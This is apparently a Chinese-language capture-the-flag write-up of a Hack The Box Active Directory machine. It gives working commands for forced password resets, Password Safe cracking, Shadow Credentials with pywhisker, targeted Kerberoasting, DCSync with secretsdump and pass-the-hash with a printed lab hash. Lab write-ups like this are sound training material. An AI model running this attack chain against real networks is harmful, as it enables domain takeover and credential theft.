Before all
Victim’s IP : 10.10.11.42
Victim’s Host : administrator.htb
Attacker’s IP : 10.10.14.10
Initial Credential: Olivia/ichliebedich
對…我那時候沒看到爆破了快一小時🫠
Recon
老生常談
如果有對這些工具不熟悉就google用法ㄅ~
port scan
Command
1 | rustscan -a 10.10.11.42 --ulimit 5000 -- -sC -sV -Pn |
Result
1 | PORT STATE SERVICE REASON VERSION |
有開 ftp/smb/ldap/winrpc 和 Microsoft HTTPAPI
初步看來版本號都沒什麼問題
bloodhound
Command
1 | bloodhound-python -c All -u 'Olivia' -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42 --zip |
接著neo4j start,bloodhound下下去就可以拖進去看ㄌ
Exploit
都是用evil-winrm登入
1 | evil-winrm -u 'Olivia' -p 'ichliebedich' -i 10.10.11.42 |
Abusing password reset
現在是Olivia的權限,先看看Outbound Objects有哪些
因為互相有操作權限,有一條reset password的線
Olivia -> Michael (利用GenericAll)
1 | net user michael Whale120 |
密碼換成Whale120
接下來是 Micahel -> Benjamin (利用ForceChangePassword)
因為 Benjamin 不支援 winrm 等登入介面,只能用 rpc 去改密碼
指令參考:https://malicious.link/posts/2017/reset-ad-user-password-with-linux/
先
1 | rpcclient -U michael //10.10.11.42 |
進去後:
1 | setuserinfo benjamin 23 'Whale120' |
然後就差點卡住了
Cracking pwsafe file
還記得剛剛有掃到一個 ftp ,就是用在這邊
Command
1 | ftp administrator.htb |
帳密就是 benjamin/Whale120
ls只有一個檔案,用get Backup.psafe3抓下來就好ㄌ
file結果:
找到一個叫做pwsafe的工具,apt抓下來~
要密碼QwQ,帶他見見john😎
1 | pwsafe2john Backup.psafe3>hash |
選定一個user,點選 Auto Type
就可以拿到密碼了
Shadow Credential
先關注 Emily 相關的權限:
對 Ethan 有 GenericWrite 權限
所謂的 msDS-KeyCredentialLink 就是存取 Windows 上該使用者各種身分驗證的金鑰(不只密碼,還有指紋、pin碼等),然後加密時是拿目標的NTLM HASH。
也就是說,如果寫入了目標的 msDS-KeyCredentialLink 並能獲取返還值,就可以取得 HASH 並嘗試爆破,這種手法就叫 Shadow Credentials
pywhisker
pywhisker可以去建立一個新的金鑰
1 | pywhisker -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --target ethan --action "add" |
targetedKerberoast.py
接著使用targetedKerberoast.py抓剛剛的SPN
1 | sudo ./targetedKerberoast.py -v -d 'administrator.htb' -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' |

最後一樣丟john就可以爆破惹
P.S.
如果撞到KRB_AP_ERR_SKEW(Clock skew too great) Error,代表時間沒對上,要與主機時間對齊:
1 | sudo su |
其他我就沒遇過什麼問題了(目前)
DCSync and Pass The Hash
Ethan對Administrator有DCSync
詳細資料可以參考:https://tttang.com/archive/1634/
用 impacket-secretsdump 炸下去~
1 | impacket-secretsdump -just-dc [email protected] |
最後針對Admin使用Pass The Hash攻擊:
1 | evil-winrm -u Administrator -H '3dc553ce4b9fd20bd016e098d2d2fd2e' -i 10.10.11.42 |
ROOTED!
After all
有點久沒打那麼多AD,發現有些概念/名詞有點生疏 :zzz:絕對不是在成為Script Kiddie的路上
這篇補了一下XD
https://xz.aliyun.com/t/15718?time__1311=GqjxnQiQEpDsD7Co0%3DGOjG8YF3xYT2ymD#toc-10